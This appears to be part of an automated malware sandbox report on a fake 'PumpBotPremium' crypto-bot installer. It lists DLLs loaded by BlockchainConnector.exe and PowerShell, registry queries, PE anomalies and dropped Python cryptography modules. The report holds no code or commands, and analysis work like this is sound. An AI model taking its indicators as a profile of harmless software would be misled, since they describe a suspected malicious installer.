Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: mf.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: mfreadwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: mfcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File written: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PumpBotPremium.msi

Static file information: File size 63906816 > 1048576

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000003.00000000.1739187011.00000000002AE000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\a\opencv-python\opencv-python\_skbuild\win-amd64-3.7\cmake-build\lib\python3\Release\cv2.pdb source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D76A75000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: BlockchainConnector.exe, 00000007.00000002.1903815403.0000019A0A0E0000.00000002.00000001.01000000.00000010.sdmp

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_00237530 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary,

3_2_00237530

Source: _MD5.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xf0c8
Source: _SHA1.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x9f02
Source: _mt19937.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x19d5b
Source: _scrypt.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xdb79
Source: QtGui.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x26ba90
Source: sip.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x28c77
Source: pythoncom310.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0xa906f
Source: mtrand.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x90fe9
Source: _Salsa20.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xe31f
Source: _cffi_backend.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x38dc3
Source: _raw_ctr.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xe14e
Source: _raw_cbc.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xd981
Source: _philox.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x1f360
Source: _ghash_clmul.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xf9cb
Source: _rust.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x66978e
Source: _multiarray_umath.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x2dc308
Source: _imagingcms.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x40e07
Source: _umath_linalg.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x2df0e
Source: _generator.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xae69c
Source: md__mypyc.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x22c3d
Source: _raw_aes.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x10e4f
Source: _BLAKE2s.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x10e8d
Source: _cpuid_c.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xe7b0
Source: _raw_ecb.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x4fa5
Source: _multiarray_tests.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x21dfc
Source: _pcg64.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x23bc6
Source: _raw_ocb.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xdbb7
Source: pywintypes310.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x26a6c
Source: _pocketfft_internal.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x24610
Source: _webp.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x89cd9
Source: _raw_aesni.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xec86
Source: _common.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x374d8
Source: _imaging.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x257081
Source: _raw_cfb.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xbbc3
Source: _strxor.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x7233
Source: bit_generator.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x365da
Source: win32crypt.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x2ba12
Source: _raw_ofb.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x4a09
Source: _bounded_integers.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x434b9
Source: _ghash_portable.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x9a05
Source: md.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x50be
Source: _brotli.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xd0a91
Source: _raw_eksblowfish.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xcfa2
Source: _psutil_windows.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x1f10a
Source: QtCore.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x260d34
Source: QtWidgets.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x4e36b6
Source: _imagingft.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x1a8a9d
Source: _SHA256.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x56a0
Source: aipackagechainer.exe.2.dr	Static PE information: real checksum: 0xda46d should be: 0xda93c
Source: _sfc64.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x13204

Source: BlockchainConnector.exe.2.dr	Static PE information: section name: .eh_fram
Source: BlockchainConnector.exe.2.dr	Static PE information: section name: .xdata
Source: BlockchainConnector.exe.4.dr	Static PE information: section name: .eh_fram
Source: BlockchainConnector.exe.4.dr	Static PE information: section name: .xdata
Source: libcrypto-1_1.dll.4.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.4.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr	Static PE information: section name: .didat
Source: python310.dll.4.dr	Static PE information: section name: PyRuntim
Source: qt5core.dll.4.dr	Static PE information: section name: .qtmimed
Source: vcruntime140.dll.4.dr	Static PE information: section name: _RDATA
Source: opencv_videoio_ffmpeg490_64.dll.4.dr	Static PE information: section name: .rodata
Source: opencv_videoio_ffmpeg490_64.dll.4.dr	Static PE information: section name: .xdata
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: .xdata
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /4
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /19
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /31
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /45
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /57
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /70
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /81
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: section name: /92
Source: _imagingft.pyd.4.dr	Static PE information: section name: _RDATA
Source: cv2.pyd.4.dr	Static PE information: section name: IPPCODE
Source: cv2.pyd.4.dr	Static PE information: section name: IPPDATA
Source: cv2.pyd.4.dr	Static PE information: section name: _RDATA
Source: cv2.pyd.4.dr	Static PE information: section name: .debug_a
Source: cv2.pyd.4.dr	Static PE information: section name: .debug_i
Source: cv2.pyd.4.dr	Static PE information: section name: .debug_s
Source: cv2.pyd.4.dr	Static PE information: section name: .debug_l

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00244444 push esi; ret	3_2_00244447
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0027CEA4 push ecx; ret	3_2_0027CEB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_030E43B0 push eax; ret	11_2_030E43C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_030E4178 push eax; ret	11_2_030E43C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_030E6092 push 9000005Fh; iretd	11_2_030E6121
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_030E6A7A push esp; ret	11_2_030E6A83

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tk86t.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe	File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd	Jump to dropped file
